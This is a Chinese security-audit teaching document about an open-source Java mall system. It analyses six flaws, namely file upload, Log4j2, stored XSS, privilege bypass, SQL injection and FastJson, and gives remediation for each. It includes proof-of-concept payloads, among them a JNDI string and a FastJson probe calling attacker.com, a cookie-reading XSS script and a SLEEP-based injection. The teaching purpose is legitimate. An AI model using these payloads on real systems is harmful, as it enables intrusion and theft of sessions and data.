Java开源商城系统安全审计教学文档<\/h1>

1. 任意文件上传漏洞<\/h2>

漏洞位置<\/h3>
管理员后台文件上传接口：
POST \/tmall\/admin\/uploadCategoryImage<\/code><\/li>
<\/ul>
漏洞分析<\/h3>
后端代码无任何过滤措施：<\/p>
@ResponseBody<\/span>
<\/span><\/span>@RequestMapping<\/span>(<\/span>value =<\/span> "admin\/uploadCategoryImage"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>POST<\/span>,<\/span> produces =<\/span> "application\/json;charset=utf-8"<\/span>)<\/span>
<\/span><\/span>public<\/span> String uploadCategoryImage<\/span>(<\/span>@RequestParam<\/span> MultipartFile file,<\/span> HttpSession session)<\/span> {<\/span>
<\/span><\/span>    String originalFileName =<\/span> file.<\/span>getOriginalFilename<\/span>();<\/span>
<\/span><\/span>    String extension =<\/span> originalFileName.<\/span>substring<\/span>(<\/span>originalFileName.<\/span>lastIndexOf<\/span>(<\/span>'.'<\/span>));<\/span>
<\/span><\/span>    String fileName =<\/span> UUID.<\/span>randomUUID<\/span>()<\/span> +<\/span> extension;<\/span> \/\/ 使用UUID重命名
<\/span><\/span><\/span><\/span>    String filePath =<\/span> session.<\/span>getServletContext<\/span>().<\/span>getRealPath<\/span>(<\/span>"\/res\/images\/item\/categoryPicture\/"<\/span> +<\/span> fileName);<\/span>
<\/span><\/span>    \/\/ 无文件类型检查，直接保存
<\/span><\/span><\/span><\/span>    file.<\/span>transferTo<\/span>(<\/span>new<\/span> File(<\/span>filePath));<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞复现<\/h3>

构造恶意JSP文件上传请求：<\/li>
<\/ol>
POST<\/span> \/tmall\/admin\/uploadCategoryImage HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----geckoformboundary588f72b1e5cfda5e42dc2d49f3443c83<\/span>
<\/span><\/span>
<\/span><\/span>------geckoformboundary588f72b1e5cfda5e42dc2d49f3443c83
<\/span><\/span>Content-Disposition: form-data; name="file"; filename="test.jsp"
<\/span><\/span>Content-Type: image\/jpeg
<\/span><\/span>
<\/span><\/span><%@ page language="java" contentType="text\/html; charset=UTF-8" pageEncoding="UTF-8"%>
<\/span><\/span><!DOCTYPE html>
<\/span><\/span><html>
<\/span><\/span><head><title>Hello World JSP<\/title><\/head>
<\/span><\/span><body>
<\/span><\/span><h1><%= "Hello, World!" %><\/h1>
<\/span><\/span><p>${"This is a JSP page."}<\/p>
<\/span><\/span><\/body>
<\/span><\/span><\/html>
<\/span><\/span>------geckoformboundary588f72b1e5cfda5e42dc2d49f3443c83--
<\/span><\/span><\/code><\/pre>修复建议<\/h3>

限制上传文件类型白名单<\/li>
检查文件内容而非仅扩展名<\/li>
将上传文件存储在非web目录<\/li>
禁用上传文件的执行权限<\/li>
<\/ol>
2. Log4j2漏洞<\/h2>
漏洞位置<\/h3>

文件上传功能中的日志记录：<\/li>
<\/ul>
logger.<\/span>info<\/span>(<\/span>"文件上传路径:{}"<\/span>,<\/span> filePath);<\/span>
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

filePath<\/code>包含用户可控的文件名<\/li>
系统使用的Log4j2版本存在漏洞<\/li>
可构造恶意文件名触发RCE<\/li>
<\/ol>
漏洞复现<\/h3>
构造包含JNDI注入payload的文件名：<\/p>
${jndi:ldap:\/\/attacker.com\/exploit}
<\/code><\/pre>
修复建议<\/h3>

升级Log4j2至最新安全版本<\/li>
对日志输出内容进行过滤<\/li>
设置log4j2.formatMsgNoLookups=true<\/code><\/li>
<\/ol>
3. 存储型XSS漏洞<\/h2>
漏洞位置<\/h3>

后台添加产品功能：POST \/tmall\/admin\/product<\/code><\/li>
<\/ul>
漏洞分析<\/h3>
@ResponseBody<\/span>
<\/span><\/span>@RequestMapping<\/span>(<\/span>value =<\/span> "admin\/product"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>POST<\/span>)<\/span>
<\/span><\/span>public<\/span> String addProduct<\/span>(<\/span>@RequestParam<\/span> String product_name,<\/span> ...)<\/span> {<\/span>
<\/span><\/span>    \/\/ 直接使用用户输入，无任何过滤
<\/span><\/span><\/span><\/span>    Product product =<\/span> new<\/span> Product().<\/span>setProduct_name<\/span>(<\/span>product_name)...;<\/span>
<\/span><\/span>    productService.<\/span>add<\/span>(<\/span>product);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞复现<\/h3>
在产品名称中插入XSS payload：<\/p>
<<\/span>script<\/span>><\/span>alert<\/span>(document.cookie<\/span>)<<\/span>\/script><\/span>
<\/span><\/span><\/code><\/pre>修复建议<\/h3>

对所有用户输入进行HTML实体编码<\/li>
使用Content Security Policy (CSP)<\/li>
设置HttpOnly标志的cookie<\/li>
<\/ol>
4. 越权漏洞（任意账户密码修改）<\/h2>
漏洞位置<\/h3>

管理员信息更新接口：PUT \/tmall\/admin\/account\/{admin_id}<\/code><\/li>
<\/ul>
漏洞分析<\/h3>
@RequestMapping<\/span>(<\/span>value =<\/span> "admin\/account\/{admin_id}"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>PUT<\/span>)<\/span>
<\/span><\/span>public<\/span> String updateAdmin<\/span>(...,<\/span> @PathVariable<\/span>(<\/span>"admin_id"<\/span>)<\/span> String admin_id)<\/span> {<\/span>
<\/span><\/span>    Object adminId =<\/span> checkAdmin(<\/span>session);<\/span> \/\/ 从session获取当前用户ID
<\/span><\/span><\/span><\/span>    \/\/ 但修改时使用用户提供的admin_id而非session中的adminId
<\/span><\/span><\/span><\/span>    Admin putAdmin =<\/span> new<\/span> Admin().<\/span>setAdmin_id<\/span>(<\/span>Integer.<\/span>valueOf<\/span>(<\/span>admin_id))...;<\/span>
<\/span><\/span>    adminService.<\/span>update<\/span>(<\/span>putAdmin);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞复现<\/h3>

正常修改密码请求：<\/li>
<\/ol>
PUT<\/span> \/tmall\/admin\/account\/1 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>...<\/span>
<\/span><\/span>admin_nickname=test&admin_password=123456&admin_newPassword=123456789
<\/span><\/span><\/code><\/pre>
修改admin_id为其他用户ID：<\/li>
<\/ol>
PUT<\/span> \/tmall\/admin\/account\/3 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>...<\/span>
<\/span><\/span>admin_nickname=test&admin_password=123456&admin_newPassword=123456789
<\/span><\/span><\/code><\/pre>修复建议<\/h3>

修改操作时验证admin_id<\/code>必须等于session中的用户ID<\/li>
实现基于角色的访问控制(RBAC)<\/li>
记录敏感操作日志<\/li>
<\/ol>
5. SQL注入漏洞<\/h2>
漏洞位置<\/h3>

用户查询接口：GET \/tmall\/admin\/user\/{index}\/{count}<\/code><\/li>
注入参数：orderBy<\/code><\/li>
<\/ul>
漏洞分析<\/h3>
@RequestMapping<\/span>(<\/span>value =<\/span> "admin\/user\/{index}\/{count}"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>GET<\/span>)<\/span>
<\/span><\/span>public<\/span> String getUserBySearch<\/span>(...,<\/span> @RequestParam<\/span>(<\/span>required =<\/span> false<\/span>)<\/span> String orderBy,<\/span> ...)<\/span> {<\/span>
<\/span><\/span>    OrderUtil orderUtil =<\/span> null<\/span>;<\/span>
<\/span><\/span>    if<\/span> (<\/span>orderBy !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        orderUtil =<\/span> new<\/span> OrderUtil(<\/span>orderBy,<\/span> isDesc);<\/span> \/\/ 直接拼接SQL
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    List<<\/span>User><\/span> userList =<\/span> userService.<\/span>getList<\/span>(<\/span>user,<\/span> orderUtil,<\/span> pageUtil);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>MyBatis中的不安全拼接：<\/p>
<if<\/span> test=<\/span>"orderUtil != null"<\/span>><\/span>
<\/span><\/span>    ORDER BY ${orderUtil.order} ${orderUtil.isDesc ? "DESC" : "ASC"}
<\/span><\/span><\/if><\/span>
<\/span><\/span><\/code><\/pre>漏洞复现<\/h3>
构造恶意orderBy参数：<\/p>
http:\/\/target\/tmall\/admin\/user\/0\/10?orderBy=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a)
<\/code><\/pre>
修复建议<\/h3>

使用预编译语句<\/li>
避免直接拼接用户输入到SQL<\/li>
对排序字段使用白名单验证<\/li>
<\/ol>
6. FastJson反序列化漏洞<\/h2>
漏洞位置<\/h3>

产品添加功能中的JSON解析：<\/li>
<\/ul>
JSONObject object =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>propertyJson);<\/span>
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

使用存在漏洞版本的FastJson<\/li>
直接解析用户可控的JSON字符串<\/li>
可构造恶意JSON触发RCE<\/li>
<\/ol>
漏洞复现<\/h3>
构造恶意propertyJson参数：<\/p>
{
<\/span><\/span>  "aa"<\/span>: {
<\/span><\/span>    "@type"<\/span>: "java.net.Inet4Address"<\/span>,
<\/span><\/span>    "val"<\/span>: "attacker.com"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>修复建议<\/h3>

升级FastJson至最新安全版本<\/li>
使用JSON.parseObject(json, Feature.SafeMode)<\/code><\/li>
限制反序列化的类白名单<\/li>
<\/ol>
综合修复方案<\/h2>


输入验证<\/strong>：<\/p>

对所有用户输入实施严格验证<\/li>
使用白名单而非黑名单<\/li>
<\/ul>
<\/li>

安全编码<\/strong>：<\/p>

避免直接拼接SQL、命令或文件路径<\/li>
使用预编译语句和参数化查询<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

实施最小权限原则<\/li>
所有敏感操作验证用户身份和权限<\/li>
<\/ul>
<\/li>

依赖管理<\/strong>：<\/p>

定期更新第三方库<\/li>
移除不必要的依赖<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

禁用目录列表<\/li>
配置安全HTTP头<\/li>
限制文件上传类型和大小<\/li>
<\/ul>
<\/li>

日志监控<\/strong>：<\/p>

记录所有敏感操作<\/li>
实施异常检测<\/li>
<\/ul>
<\/li>
<\/ol>
通过全面实施这些安全措施，可显著提高系统的安全性，防止文中提到的各类漏洞被利用。<\/p>